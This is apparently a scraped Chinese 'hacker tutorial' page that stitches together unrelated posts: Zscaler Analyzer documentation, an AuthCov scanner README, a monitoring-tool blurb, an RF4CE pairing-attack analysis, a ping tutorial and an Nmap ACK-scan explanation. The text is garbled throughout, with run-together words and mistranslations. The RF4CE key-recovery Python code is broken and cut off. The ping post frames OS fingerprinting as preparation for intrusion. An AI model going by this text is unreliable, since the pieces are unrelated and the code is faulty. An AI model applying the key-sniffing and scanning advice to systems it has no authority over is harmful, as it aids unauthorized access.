黑客教程

使用ZscalerAnalyzer应用程序来分析您的位置与Zscaler强制执行节点(ZEN)之间的路径,或者分析您的浏览器加载网页所花费的时间,以便Zscaler支持团队可以检测到潜在的问题。该应用程序执行MTR(Z-Traceroute)和完整的网页负载测试(Z-WebLoad)。结果为Zscaler支持团队提供了快速调试网络问题所需的所有信息。您可以以不同的时间间隔多次运行该应用程序,以更全面地了解您的网络路径和性能。例如,您可以运行将应用程序配置为每小时运行五个小时。结果被设计为通过Zscaler支持发送给Zscaler运营团队进行分析。他们的经验和对整个云的总体了解使他们能够解释数据并确定网络路径中的潜在问题。Zscaler强烈建议您在没有咨询Zscaler支持的情况下不要尝试解释结果。通过下载ZscalerAnalyzer,您同意https://www.zscaler.com/legal/license-agreement-for-zscaler-software/上提供的Zscaler软件条款。此外,您还承认并同意Zscaler将(i)使用您提供的信息来解决网络问题;和(ⅱ)在其商店云这样的信息(这将只通过一个唯一的URL访问)。明确同意您使用ZSCALER分析仪,并同意遵守这些条款和条件。如果您不同意,请勿下载和/或以其他方式使用ZSCALER分析仪。展开全部要求您可以从具有以下设备的设备上运行该应用程序:Java(JRE)1.8更新40或更高版本MicrosoftWindows7或更高版本MacOSX安装执行以下操作以安装ZscalerAnalyzer应用程序:在https://zmtr.zscaler.com/下载该应用程序的最新版本。单击Windows或MacOS下载该应用程序。请执行以下任一操作:在Windows计算机上:运行ZscalerAnalyzer-windows-installer.exe。完成向导中的步骤。确保将应用程序安装在类似于库/文档的目录中,以方便安装。如果将其安装在ProgramFiles目录中,则可能需要其他权限。要么在运行MacOSX或更高版本的设备上:运行ZscalerAnalyzer-osx-installer.dmg。完成向导中的步骤。注意:如果您的安全设置阻止您在Mac上安装应用程序,请执行以下操作:从Apple菜单身份验证启动系统偏好设置。选择“安全和隐私”,单击“常规”选项卡,然后单击角落的锁定图标以解锁设置。从“允许下载应用程序”列表中,选择“MacAppStore”和“已标识的开发人员”。接受任何安全警告(如果显示)。安装应用程序。Zscaler分析器TraceRoute使用ZscalerAnalyzer应用程序分析您的位置与Zscaler强制执行节点(ZEN)之间的路径,以便Zscaler支持团队可以检测到潜在的网络问题。该应用程序执行MTR(我的Traceroute),结果将为Zscaler支持团队提供他们快速调试网络问题所需的所有信息。您可以以不同的时间间隔多次运行该应用程序,以更全面地了解您的网络路径。例如,您可以运行将应用程序配置为每小时运行五个小时结果被设计为通过Zscaler支持发送给Zscaler运营团队进行分析。他们的经验和对整个云的总体了解使他们能够解释数据并确定网络路径中的潜在问题。Zscaler强烈建议您在没有咨询Zscaler支持的情况下不要尝试解释结果。如果使用GRE或IPSEC隧道将流量发送到ZEN,则MTR必须从不通过隧道的PC上运行。通过隧道进行的MTR将不会显示有用的信息。运行Z-TraceRoute启动应用程序时,单击Z-TraceRoute选项卡以查看与以下类似的窗口。执行以下操作以运行ZscalerNetworkAnalyzer应用程序:定义设置:主机:如果您的计算机已连接到ZEN,则此字段显示ZEN的主机名。例如,如果您要分析到另一个ZEN的路径,则可以指定其他主机名。每次运行:该应用程序可以在不同的时间间隔自动运行。例如,要将应用程序配置为每小时运行10次,请将“重复次数”更改为10,然后选择“每1小时重复一次”的间隔。这10个测试称为组。数据包计数:要发送的数据包数。跳数限制:测量的最大网络跳数。要定义以下设置,请单击“高级设置”按钮以查看“Z-Traceroute-高级设置”窗口。数据:数据包大小(以字节为单位)超时:等待回复的最大秒数命令:如果Zscaler支持请求您覆盖默认设置以便更好地解决某些问题,则可以从此字段配置高级设置。要获取所有选项的列表,请运行:run[host=][protocol=][port=][repeat=][interval=][data=][count=][maxhop=][timeout=]Options:hostPingthespecifiedhost/IPaddressuntilstopped.Default:gateway.zscaler.netprotocolProtocoltobeusedinprobing.Valid:ICMP,TCP,UDP,AutoDefault:ICMPportPorttobeusedinprobing.Valid:[1-65535]Default:80repeatNumberoftimestorepeatthetest.Valid:[1-99]Default:1intervalGapbetweeneachtestrun(inminutes).Valid:[10,15,30,60,90,120]Default:10dataLengthofrawdataused.Valid:[1-60]Default:32countNumberofpacketspernode.Valid:[1-99]Default:50maxhopNumberofmaximumhops.Valid:[1-60]Default:30timeoutTimeoutinsecondstowaitforeachreply.Valid:[1-60]Default:2例:runcount=10timeout=5host=gateway.zscaler.netmaxhop=50单击开始测试。该应用程序在地图上显示客户端和ZEN的地理位置,如下所示。请注意,显示的位置可能不正确。这对于确定客户端是否已正确地理定位或客户端的流量是否未到达最近的ZEN很有用。该应用程序更新“主机延迟”和“每跳延迟”小部件以及结果表。停止测试按钮代替了开始测试按钮,如下所示。如果您随时单击“停止测试”按钮,则该应用会取消该组中的所有其他测试。您可以在完成所有配置的运行之前最小化ZscalerPerformanceAnalyzer应用程序。当工具完成所有运行后,“开始测试”按钮将替换为“停止测试”按钮。查看结果如果您将ZscalerAnalyzer应用程序配置为执行多次运行,则可以通过从结果列表中选择它来查看组中每个已完成运行的结果,如下所示。该主机延迟小部件显示当设备到达ZEN发生的延迟。“每跳延迟”窗口小部件显示每个中间网络跳的延迟。结果表概述了结果。它显示以下内容:#:跳数主机:中间主机的IP地址P.已发送:发送到中间主机的包数P.Recv:主机发送回的数据包数P.丢失:丢包率最佳测试:所有测试中最小的延迟(以秒为单位)LastT.:最后发送的数据包的延迟平均。T.:平均延迟最差的T:所有测试中的最高延迟导出结果当应用程序完成所有已配置的运行时,请导出结果,以便将其发送给Zscaler支持。单击导出所有结果按钮,然后导航到要将结果保存到的文件夹。组中所有运行结果均保存到CSV文件中,文件名类似于za_results_12_15_2015_12_56_53_PM_PST。导出文件中显示的地理位置可能不正确。例如,美国的中间啤酒花可能显示在欧洲。以下是CSV文件中每个组(同一测试的重复)显示的信息:结果导入时间:数据导出时间ZA版本:应用程序的版本号组号:组IDZA设置:为测试定义的设置主机:运行测试的主机的名称内部源IP:设备的本地IP地址公用源IP:出站流量的公用IP地址协议:为测试选择的协议。运行次数:运行测试的次数以下是针对组内每次运行显示的信息:运行编号:运行ID开始时间:测试开始的时间结束时间:测试结束的时间测试完成于:测试持续时间SNo:每个中间主机的测试结果:主机:中间主机的IP地址经度:中间主机的GeoIP坐标纬度:中间主机的GeoIP坐标位置名称:中间主机的GeoIP国家发送的数据包:发送到中间主机的数据包数接收到的数据包:主机发送回的数据包数丢失:丢失的数据包数量上次时间:上次发送数据包的延迟最佳时间:所有测试中的最小延迟最差时间:所有测试中的最高延迟平均时间:平均延迟标准偏差:标准偏差Zscaler分析器WebLoad使用ZscalerAnalyzer应用程序来分析浏览器加载网页所花费的时间,以便Zscaler支持团队可以检测到潜在的问题。该应用程序执行网页负载测试,结果将为Zscaler支持团队提供他们快速调试问题所需的所有信息。根据您的环境,该工具可以比较通过ZEN的加载时间和直接进入Internet的加载时间。您可以以不同的时间间隔多次运行该应用程序,以更全面地了解您的网络。例如,您可以将应用程序配置为每小时运行五个小时。执行以下操作以在Zscaler分析器上运行WebLoad:定义设置:负载:该应用程序一次最多可以测试10个网址。该应用程序提供了要运行的默认URL列表。您可以选择对所有URL或仅对其中一个运行测试。要删除或添加URL,请单击“高级设置”按钮。每个:应用程序可以在不同的时间间隔自动运行。例如,要将应用程序配置为每小时运行10次,请将“重复”更改为10,然后选择每1小时运行一次的间隔。这10个测试称为组。用途:首次打开应用程序时,“页面加载时间”窗口小部件会根据您的环境提供不同的结果。如果首次启动应用程序时流量通过Zscaler服务,则说明您正在使用Zscaler强制代理运行该应用程序。如果未通过服务验证,则首次打开应用程序时可能会要求您进行验证。身份验证页面显示在左侧的“当前站点预览”中。如果首次启动应用程序时流量没有通过Zscaler服务,则可以在列表中选择以下选项:系统代理:如果要使用Internet浏览器设置,请选择此选项。例如,如果您已将浏览器配置为使用PAC文件或ZEN,则该应用将使用这些设置。自定义PAC文件:如果您想使用PAC文件将流量转发到Zscaler服务,请选择此选项。Zscaler服务托管默认的PAC文件,这些文件配置为自动将所有浏览器流量转发到最近的ZEN。要了解如何检索默认的PAC文件URL,请参阅如何使用PAC文件将流量转发到Zscaler服务?自定义网关:如果要指定要将流量转发到的ZEN,请选择此选项。要指定ZEN,请输入以下内容:网关:输入网关。<cloud_name>。要了解如何查找云名称,请参阅我的云名称是什么?端口:输入端口号。如果您选择使用“自定义PAC文件”或“自定义网关”运行应用程序,则系统将提示您进行身份验证,然后才能开始测试。结果表将提供以下类别的结果:使用代理:您的流量通过Zscaler服务没有代理:您的流量不通过Zscaler服务要定义以下设置,请单击“高级设置”按钮以查看“ZWebload-高级设置”窗口。编辑网站:要删除URL,请选择一个URL,然后单击减号。输入新网址:要添加网址,请在字段中输入有效的网址,然后点击添加网站。网站下载次数:每个网站的下载次数。单击开始测试。该应用程序将在列表中显示URL的网页,如下所示。应用程序将更新“页面加载时间”窗口小部件和结果表。在停止测试按钮取代了开始测试按钮,如下图所示。如果您随时单击“停止测试”按钮,则该应用会取消该组中的所有其他测试。您可以在完成所有配置的运行之前最小化ZscalerAnalyzer应用程序。当工具完成所有运行后,“开始测试”按钮将替换为“停止测试”按钮。查看结果如果您将ZscalerAnalyzer应用程序配置为执行多次运行,则可以通过从结果列表中选择它来查看组中每个已完成运行的结果,如下所示。如果您将ZscalerAnalyzer应用程序配置为测试多个URL,则可以通过从“显示结果为”列表中选择“网站”来查看组中每个URL的结果。“页面加载时间”窗口小部件显示浏览器加载网页所花费的时间。结果表概述了结果。它显示以下内容:时间戳记:测试开始的时间网站:经测试的URL响应时间:浏览器加载主网页所需的平均时间导出结果当应用程序完成所有已配置的运行时,请导出结果,以便将其发送给Zscaler支持。1.单击导出所有结果按钮,然后导航到要将结果保存到的文件夹。组中所有运行结果都保存到CSV文件中,文件名类似于za_results_12_04_2015_09_49_51_AM_PST。将此文件附加到支持票证上并提交。导出文件包含Zscaler支持团队需要的所有信息,以正确解释结果。在发送到Zscaler之前,请不要修改文件。以下是每个组显示的信息(重复相同的测试):结果导入时间:数据导出时间工具版本:应用程序的版本号组号:组IDWebLoad设置:为测试定义的设置运行次数:运行测试的次数代理类型:运行测试的代理的名称网关名称:运行测试的网关的名称网关IP:运行测试的网关的IP地址ZEN:从中运行测试的Zscaler强制执行节点以下是针对组内每次运行显示的信息:运行编号:运行ID开始时间:测试开始的时间结束时间:测试结束的时间测试完成于:测试持续时间SNo:每个直接主机的测试结果:网址:经过测试的网址URLIP:测试的URL的IP地址加载次数:URL重复的次数响应代码:成功或失败请求的HTTP响应代码DNS时间:客户端与DNS服务器联系所花费的时间连接时间:浏览器连接到服务器所花费的时间整页时间:浏览器加载整个网页及其所有资产(如图像,脚本等)所花费的时间。

黑客教程

Webappauthorizationcoveragescanning.IntroductionAuthCovcrawlsyourwebapplicationusingaChromeheadlessbrowserwhileloggedinasapre-defineduser.ItinterceptsandlogsAPIrequestsaswellaspagesloadedduringthecrawlingphase.Inthenextphaseitlogsinunderadifferentuseraccount,the"intruder",andattemptstoaccesseachofoneoftheAPIrequestsorpagesdiscoveredpreviously.Itrepeatsthisstepforeachintruderuserdefined.Finallyitgeneratesadetailedreportlistingtheresourcesdiscoveredandwhetherornottheyareaccessibletotheintruderusers.AnexamplereportgeneratedfromscanningalocalWordpressinstance:FeaturesWorkswithsingle-page-applicationsandtraditionalmulti-page-applicationsHandlestoken-basedandcookie-basedauthenticationmechanismsGeneratesanin-depthreportinHTMLformatScreenshotsofeachpagecrawledcanbeviewedinthereportInstallationInstallnode10.Thenrun:$npminstall-gauthcovUsageGenerateaconfigforthesiteyouwanttoscan:$authcovnewmyconfig.jsUpdatethevaluesinmyconfig.jsTestyourconfigurationvaluesbyrunningthiscommandtoensurethebrowserislogginginsuccessfully.$authcovtest-loginmyconfig.js--headless=falseCrawlyoursite:$authcovcrawlmyconfig.jsAttemptintrusionagainsttheresourcesdiscoveredduringthecrawlingphase:$authcovintrudemyconfig.jsViewthegeneratedreportat:./tmp/report/index.htmlConfigurationThefollowingoptionscanbesetinyourconfigfile:optiontypedescriptionbaseUrlstringThebaseURLofthesite.Thisiswherethecrawlerwillstartfrom.crawlUserobjectTheusertocrawlthesiteunder.Example:{"username":"admin","password":"1234"}intrudersarrayTheuserswhowillintrudeontheapiendpointsandpagesdiscoveredduringthecrawlingphase.GenerallythesewillbeusersthesameorlessprivilegethanthecrawlUser.Tointrudeasanot-logged-inuser,addauserwiththeusername"Public"andpasswordnull.Example:[{"username":"john","password":"4321"},{"username":"Public","password":null}]typestringIsthisasingle-page-application(i.e.javascriptfrontendwhichqueriesanAPIbackend)oramore"traditional"multi-page-application.(Choose"mpa"or"spa").authenticationTypestringDoesthesiteauthenticateusersbyusingthecookiessentbythebrowser,orbyatokensentinarequestheader?ForanMPAthiswillalmostalwaysbesetto"cookie".InanSPAthiscouldbeeither"cookie"or"token".authorisationHeadersarrayWhichrequestheadersareneededtobesentinordertoauthenticateauser?IfauthenticationType=cookie,thenthisshouldbesetto["cookie"].IfauthenticationType=token,thenthiswillbesomethinglike:["X-Auth-Token"].maxDepthintegerThemaximumdepthwithwhichtocrawlthesite.Recommendstartingat1andthentrycrawlingathigherdepthstomakesurethecrawlerisabletofinishfastenough.verboseOutputbooleanLogataverboselevel,usefulfordebugging.saveResponsesbooleanSavetheresponsebodiesfromAPIendpointssoyoucanviewtheminthereport.saveScreenshotsbooleanSavebrowserscreenshotsforthepagescrawledsoyoucanviewtheminthereport.clickButtonsboolean(Experimentalfeature)oneachpagecrawled,clickallthebuttonsonthatpageandrecordanyAPIrequestsmade.Canbeusefulonsiteswhichhavelotsofuserinteractionsthroughmodals,popupsetc.xhrTimeoutintegerHowlongtowaitforXHRrequeststocompletewhilecrawlingeachpage.(seconds)pageTimeoutintegerHowlongtowaitforpagetoloadwhilecrawling.(seconds)headlessbooleanSetthistofalseforthecrawlertoopenachromebrowsersoyoucanseethecrawlinghappeninglive.unAuthorizedStatusCodesarrayTheHTTPresponsestatuscodesthatdecidewhetherornotanAPIendpointorpageareauthorizedfortheuserrequestingit.OptionallydefineafunctionresponseIsAuthorisedtodetermineifarequestwasauthorized.Example:[401,403,404]ignoreLinksIncludingarrayDonotcrawlURLscontaininganystringsinthisarray.Forexample,ifsetto["/logout"]thentheurl:http://localhost:3000/logoutwillnotbecrawled.OptionallydefineafunctionignoreLink(url)belowtodetermineifaURLshouldbecrawledornot.ignoreAPIrequestsIncludingarrayDonotrecordAPIrecordsmadetoURLswhichcontainanyofthethestringsinthisarray.OptionallydefineafunctionignoreApiRequest(url)todetermineifarequestshouldberecordedornot.ignoreButtonsIncludingarrayIfclickButtonssettotrue,thendonotclickbuttonswho'souterHTMLcontainsanyofthestringsinthisarray.OptionallydefineafunctionignoreButton(url)below.loginConfigobjectConfigurehowthebrowserwilllogintoyourwebapp.OptionallydefineanasyncfunctionloginFunction(page,username,password).(Moreaboutthisbelow).cookiesTriggeringPagestring(optional)whenauthenticationType=cookie,thiswillsetapagesothattheintruderwillbrowsetothispageandthencapturethecookiesfromthebrowser.Thiscanbeusefulifthesitesetsthepathfieldoncookies.Defaultstooptions.baseUrl.tokenTriggeringPagestring(optional)whenauthenticationType=token,thiswillsetapagesothatthetheintruderwillbrowsetothispageandthencapturetheauthorisationHeadersfromtheinterceptedAPIrequests.Thiscanbeusefulifthesite'sbaseUrldoesnotmakeanyAPIrequestsandsocannotcapturetheauthheadersfromthatpage.Defaultstooptions.baseUrl.ConfiguringtheLoginTherearetwowaystoconfigurethelogininyourconfigfile:Usingthedefaultloginmechanismwhichusespuppeteertoentertheusernameandpasswordintothespecifiedinputsandthenclickthespecifiedsubmitbutton.ThiscanbeconfiguredbysettingtheloginConfigoptioninyourconfigfilelikethis.Seethisexampletoo."loginConfig":{"url":"http://localhost/login","usernameXpath":"input[name=email]","passwordXpath":"input[name=password]","submitXpath":"#login-button"}Ifyourloginformismorecomplexandinvolvesmoreuserinteractionthenyoucandefineyourownpuppeteerfunctioninyourconfigfilelikethis.Seethisexampletoo."loginFunction":asyncfunction(page,username,password){awaitpage.goto('http://localhost:3001/users/sign_in');awaitpage.waitForSelector('input[type=email]');awaitpage.waitForSelector('input[type=password]');awaitpage.type('input[type=email]',username);awaitpage.type('input[type=password]',password);awaitpage.tap('input[type=submit]');awaitpage.waitFor(500);return;}Don'tfogettoruntheauthcovtest-logincommandinheadfulmodeinordertoverifythebrowserlogsinsuccessfully.ContributingUnitTestsUnittests:$npmtesttest/unitIntegrationtests:Firstdownloadandruntheexampleapp.Thenrunthetests:$npmtesttest/integration

黑客教程

易于使用的GUI与向导,使显示器设置简单。非常可靠。您可以指望IsItUp在出现问题的第一个迹象时提醒您。各种监视器类型,包括Ping,网站,TCP/IP端口,Windows服务,SNMP,磁盘可用空间,DNS,CPU,内存,事件日志,带宽和特殊的往返电子邮件系统监视器。设备依赖关系以防止警报风暴。使用特殊的“快速启动”向导在5分钟内启动并运行,使初始配置成为快照。通过电子邮件或电话提供的客户支持监控传感器包括各种各样的监视器传感器,例如简单的Ping用于向上/向下监视复杂的Web站点和网络监视。IsItUp通过监控网络基础设施(包括路由器,交换机,防火墙,服务,磁盘,CPU,内存,事件日志和带宽)来跟踪网络的运行状况。在问题成为主要问题之前,IsItUp会提醒您。事件日志监控IsItUp可以监控本地和远程系统上的Windows事件日志。由于大多数Windows子系统和许多应用程序使用事件日志作为传递有关其状态和操作的信息的主要位置,因此系统管理员必须每天不断查看大量事件日志。IsItUp通过查看事件日志并在发生符合预选标准的事件时警告系统管理员来减轻此负担。这使得IsItUp成为维护系统健康和安全的灵活工具。回合旅电子邮件监控您的电子邮件基础架构可以说是网络中最重要的元素之一。此设备监视器旨在确保您的电子邮件服务器可以运行,无论它们是在本地运行,在云中运行,还是使用托管电子邮件提供商。它将探测消息发送到一个或多个电子邮件服务器,并确保它在用户指定的时间内回复。下载

2019-9-17 17 0
黑客教程

配对流程RF4CE配对是一个相当简单的过程,带来一些安全隐患,可能是由于试图简化最终用户的配对过程。首先,我们有发现阶段。外围设备发送具有一些特定属性集的发现请求命令,并等待来自满足这些要求的设备的发现响应命令。配对本身从外围设备发出的配对请求命令开始。此请求包括应发生的密钥交换传输的数量(最多255个)。基站发出配对请求响应命令并开始密钥交换阶段。加密密钥由基础生成。然后它生成n-1个随机数,其中n是配对请求命令中外围设备指定的密钥交换的数量。基地传输这些密钥种子及其序列号。在外围设备上,接收密钥种子并用于导出密钥。第n个种子包含与其他随机种子异或的加密密钥。如果没有正确接收任何密钥种子帧,则生成新的密钥种子并以相同的序列号发送。攻击者需要拦截每个序列号的最终密钥种子,以便成功拦截密钥。密钥恢复算法如下所示:用Python编写:defderiveKey(seeds):phase1=0forcurrent_seedinseeds:phase1=phase1^current_seedphase2_seeds=[]foriinrange(5):start=i*16end=(i+1)*16s=phase1[start:end]phase2_seeds.append(s)key=0forcurrent_seedinphase2_seeds:key=key^c将种子一起异或成一个大的“阶段1”。然后将该阶段1分成五个二级种子。这些种子最终被异或一起形成加密密钥。请注意,下图假设配对请求指定使用四个密钥种子。密钥交换发生后,在两个设备上生成配对表条目。此条目包含对方设备的物理地址,以及配对密钥和一些元数据。要确认配对,必须在两个设备之间传输ping请求和响应对。我们看到的大多数实现都包括辅助配对确认。这通常采用在基本设备的连接屏幕上显示的一组数字中的用户类型的形式。如果确认不正确,则删除刚在任一设备上创建的配对表条目。请注意,此行为不是协议标准的一部分,并且取决于制造商和设备,并且在我们观察到的实现中,确认代码未以加密方式使用。加密属性当设置RF4CE帧的网络头中的安全标志时,帧的有效载荷字段被加密。RF4CE(与其他IEEE802.15.4安全规范一样)使用AES-CCM*23模式加密数据。消息使用随机数和标头加密。nonce形成如下:使用消息完整性代码(MIC)确定消息验证。消息完整性代码是加密RF4CE帧的最后一个字段;它长度为四个字节,并根据AES-CCM算法返回的身份验证进行验证。攻击场景攻击RF4CE归结为攻击规范中内置的一些便利。例如,设备根据“启动时的信道条件”选择其频道,如果没有得到任何响应,则可以自动更改频道。这导致可能的攻击向量,其使用RF信道干扰来迫使成对的设备进入单独的信道。密钥交换是使用RF4CE的另一个方便,易受攻击的阶段。密钥是通过无线发送的,没有真正的加密-相反,该过程涉及混淆密钥材料并将其拆分,希望攻击者可能无法捕获每个密钥交换传输消息。任何具有能够捕获密钥种子交换的密钥生成算法知识的攻击者都能够获得加密密钥并绕过RF4CE中的任何安全功能。RF4CE还容易受到攻击,因为RF4CE设备仅在应用层配对,而不是使用802.15.4MAC层安全性。因此,没有启用RF4CE安全性的帧将通过无线方式完全以明文形式发送,从而使拦截变得非常简单。关注和考虑因素RF4CE存在许多问题,这些问题都是协议固有的以及设备制造商如何实现协议。密钥交换本身就是一个漏洞,因为攻击者通过获取用于所有未来加密通信的共享密钥材料来获得设备配对。弱密钥交换可以通过使用带外信息交换来补救,这意味着以攻击者收听无线电频率空间的方式传送信息将无法提取信息。这是像Zigbee3.0这样的选项,它允许“安装代码”,有助于安全的信息交换4。此外,每个设备的非对称密钥对或基于QR码或引脚的配对(例如ZWaveS25中使用的配对)也可以解决这个问题。由于在RF4CE(音频传输等)的许多“高(呃)带宽”使用中,通常不启用安全性,因此安全性也受到损害。范围内的任何攻击者都可以通过无线方式窃听数据,甚至无需配对。设备制造商可以通过对所有通信强制使用安全模式来解决此问题。虽然由于设备的速度和功率可用性,嵌入式工程师面临着实施加密技术的挑战,但许多芯片组上提供的AES-CCM*算法的硬件加速以及其他轻量级加密选项(如果需要)提供了多种选择来应对这些挑战,同时实现安全。

黑客教程

ping是每个人学习都必须接触到的命令,可是ping在多少人手中只是检测对方是否在线的工具,却并不知道ping的许多其他用途。ping是电脑系统自带的一个可执行命令,可以用来检测网络是否通畅和网速的快慢,是必须学习而且掌握的一个命令。以前危险漫步的博客里多少会有提到,今天再给大家单独列出来讲一讲。ping的原理非常简单,利用本机向目标主机发送一个数据包,之后要求目标主机回复一个同样大小的数据包,以此来检测机器是否连通,及网速大小,对方主机的系统类型等等信息。一,ping的基本用法(1)ping网速打开命令提示符窗口,输入“pingxxx.xxx.xxx.xxx”若一直出现“Requesttimedout”则表示网络不通。若出现四行“Replyfromxxx.xxx.xxx.xxx:bytes=32time=xxmsTTL=xx”则可以ping通,这里的“time-xxms”就是我们需要的数据,“time-”后面的数字越小,则网速越快。若ping本机ip,那么time<Ims。若“Requesttimedout”与“Replyfromxxx.xxx.xxx.xxx:bytes=32time=xxmsTTL=xx”交替出现,则表示有丢包现象,网络不稳定。(2)ping网卡工作状态(3)ping是验证网卡是否正常工作,电脑能否上网等的最简单方法。输入“pingxXx.xxx.xxx.xxx”若出现“Requesttimedout”则表示本地网卡未正常工作。若连续四次出现“Replyfromxxx.xxx.xxx.xxx:bytes=32time=xxmsTTL=xx”则表示本地网卡正常运行。(3)验证DNS服务器输入“ping域名”若返回“UnknownHostName”则表示不能到达。若返回“Requestfromxxx.xxx.xxx.xxx:bytes=32time-xxmsTTL-xx”则表示DNS服务器能正常将域名转化为ip地址,这样我们还可以顺便查看网站所使用的ip地址。(4)判断目标主机的系统类型(5)通过ping目标ip,在对方返回的TTL值中,可以粗略的判断对方的系统类型,一般情况下,100-130之间的为windows系统240-255之间的为unDdlinux但是TTL值可以修改。入侵之前可以先看下对方的系统类型,更好的达到入侵目的。二.ping后返回的数据及分析“bytes=32”表示ICMP中有32个字节的数据。“time”表示往返时间“sent”发送多少个秒包“Received”受到多少回应包“lost”丢失多少包“rlvLnmum”最小值“maxmum”最大值“Average”平均值“Requesttimedout”返回这种数据表示:a目标ip已关机,或网络上不存在该地址。b目标ip存在,但是对方设置了ICMP数据过渡,可以用ping-a来检测对方,若获得对方的NetBios名称,则对方在线。c错误设置ip地址。Destinationhostunreachable表示网络出现故障。"BadlPaddress"这个信息表明可能没有连接到DNS服务器,所以无法解析这个ip,也可能这个ip地址不存在。Sourcequenchreceiyed这个信息比较特殊,出现的几率比较小,表示对方中途的服务器繁忙,无法应答。“Unknownhost”不知名主机“Noanswer”无响应pingxxx.xxx.xxx.xxxip为本机循环地址,ping不通则表明本地TCP/IP协议不能正常工作。transmitfailerror,code1004310043网卡驱动不正常。UnknowhostnameDNS配置不正确。三,“destinationhostunrea”与meout区别如果经过所有的路由表中具有达到目标的路由表中具有达到目标的路由,而目标因为其他原因未达到,会出现“timeout”,如果路由表中连达到目标的路由都没有,就会出现“destinationhostunreac'hable”下面举一个用ping命令来查找电脑故障的例子。假设我的电脑:网关:192.168.0.1本机ip:192.168.0.11DNS服务器ip:221.1.212.1301.打开命令提示符窗口,输入“ping192.168.0.11”若出现“Requesttimeout”则说明网卡不能正常工作。2.输入“ping192.168.0.1”若出现“Requesttimeout”则说明网络线路有问题。3.输入任一域外主机ip,看数据包是能送出,输入“pjng61.135.169.125”若出现“Requesttimeout”则表面网关设置错误。通过以上一系列的裣查,就可以轻松找到电脑上不去网的根源所在,就可以轻松排除电脑故障。以上为我所总结的ping命令的技巧应用,小命令里藏着大应用,不要简单的认为ping只是一个小小的可执行命令,其中的一些东西可能是一些人第一次听说,要充分利用我们自己已经掌握的技巧,这样才能完美我们的技术!公众号:一个黑客创业者

黑客教程

ACK扫描发送仅设置了ACK位的TCP数据包。无论端口是打开还是关闭,RFC793都要求目标使用RST数据包进行响应。另一方面,阻止探测的防火墙通常不响应或发回ICMP目标不可达错误。这种区别允许Nmap报告是否正在过滤ACK数据包。NmapACK扫描报告的过滤端口集通常小于针对同一台机器的SYN扫描,因为ACK扫描更难以过滤。许多网络允许几乎不受限制的出站连接,但希望阻止Internet主机启动与它们的连接。阻止传入的SYN数据包(没有设置ACK位)是一种简单的方法,但它仍然允许任何ACK数据包通过。阻止这些ACK数据包更加困难,因为它们不会告诉哪一方开始连接。要阻止未经请求的ACK数据包(由NmapACK扫描发送),确定给定的ACK是否合适。这些状态防火墙通常更安全,因为它们可能更具限制性。阻止ACK扫描是一个额外的可用限制。缺点是它们需要更多资源才能运行,并且状态防火墙重启可能导致设备丢失状态并终止通过它的所有已建立连接。虽然状态防火墙很普遍并且越来越受欢迎,但无状态方法仍然非常普遍。例如,LinuxNetfilter/iptables系统支持--syn便利选项,使上述无状态方法易于实现。在上一节中,SYN扫描显示scanme.nmap.org上的1,000个常见端口中的六个都处于过滤状态。针对同一主机的ACK扫描,以确定它是否使用状态防火墙。针对Scanme的ACK扫描#nmap-sA-T4scanme.nmap.org启动Nmap(http://nmap.org)scanme.nmap.org的Nmap扫描报告(64.13.134.52)未显示:994过滤端口港口国服务22/tcp未过滤的ssh25/tcp未经过滤的smtp53/tcp未过滤的域名70/tcp未过滤的地鼠80/tcp未经过滤的http113/tcp未过滤的auth完成Nmap:在5.96秒内扫描1个IP地址(1个主机)此处显示SYN扫描中显示的相同六个端口。其他994仍在过滤。这是因为Scanme受这个有状态iptables指令的保护:iptables-AINPUT-mstate--stateESTABLISHED,RELATED-jACCEPT。这仅接受属于已建立连接或与已建立连接相关的数据包。除了显示的六个特殊端口外,Nmap发送的未经请求的ACK数据包将被丢弃。特殊规则允许所有数据包到端口22,25,53,70和80,以及发送RST数据包响应端口113探测器。请注意,显示的六个端口位于unfiltered因为ACK扫描不能进一步将它们分成open(22,53和80)或closed(25,70,113)。现在让我们看另一个例子。我本地网络上名为Para的Linux主机使用以下(简化以节省空间)防火墙脚本:#!/bin/sh的##一个简单的,无状态的,基于主机的防火墙脚本。#首先,刷新并删除任何现有表iptables-Fiptables-X#默认拒绝(输入/转发)iptables--policyINPUTDROPiptables--policyOUTPUTACCEPTiptables--policyFORWARDDROP#我想从外面访问ssh和wwwiptables-AINPUT-mmultiport-ptcp--destination-port22,80-jACCEPT#允许响应传出的TCP请求iptables-AINPUT--prototcp!--syn-jACCEPT此防火墙是无状态的,因为没有--state选项或-mstate模块请求的迹象。针对Para的对比SYN和ACK扫描#nmap-sS-p1-100-T4para启动Nmap(http://nmap.org)para(192.168.10.191)的Nmap扫描报告未显示:98个过滤端口港口国服务22/tcp打开ssh80/tcp关闭httpMAC地址:00:60:1D:38:32:90(朗讯科技)完成Nmap:在3.81秒内扫描1个IP地址(1个主机)#nmap-sA-p1-100-T4para启动Nmap(http://nmap.org)para(192.168.10.191)上的所有100个扫描端口均为:未过滤MAC地址:00:60:1D:38:32:90(朗讯科技)完成Nmap:在0.70秒内扫描1个IP地址(1个主机)在SYN扫描中,过滤了100个端口中的98个。然而,ACK扫描显示每个扫描端口unfiltered。换句话说,所有的ACK数据包都在不受阻碍地引发RST响应。这些响应也使扫描速度提高了五倍以上,因为它不必等待超时。现在我们知道如何区分有状态防火墙和无状态防火墙,但有什么用呢?Para的ACK扫描显示某些数据包可能已到达目标主机。我说可能是因为防火墙伪造总是可行的。虽然您可能无法与这些端口建立TCP连接,但它们可用于确定正在使用的IP地址,操作系统检测测试,某些IPID诡计,以及作为隧道命令到rootkit的通道安装在那些机器上。其他扫描类型,例如FIN扫描,甚至可以确定哪些端口是开放的,从而推断出主机的目的。这些主机可能有用作僵尸用于IPID空闲扫描。这对扫描还表明,我们所谓的端口状态不仅仅是端口本身的属性。这里,filtered一个扫描类型和unfiltered另一个扫描类型考虑相同的端口号。您扫描的IP地址,沿途任何过滤设备的规则以及您访问的目标计算机的哪个界面都会影响Nmap查看端口的方式。端口表仅反映Nmap在特定计算机上运行时所看到的内容,并在给定时间使用一组已定义的选项。

2019-6-22 41 0
黑客教程

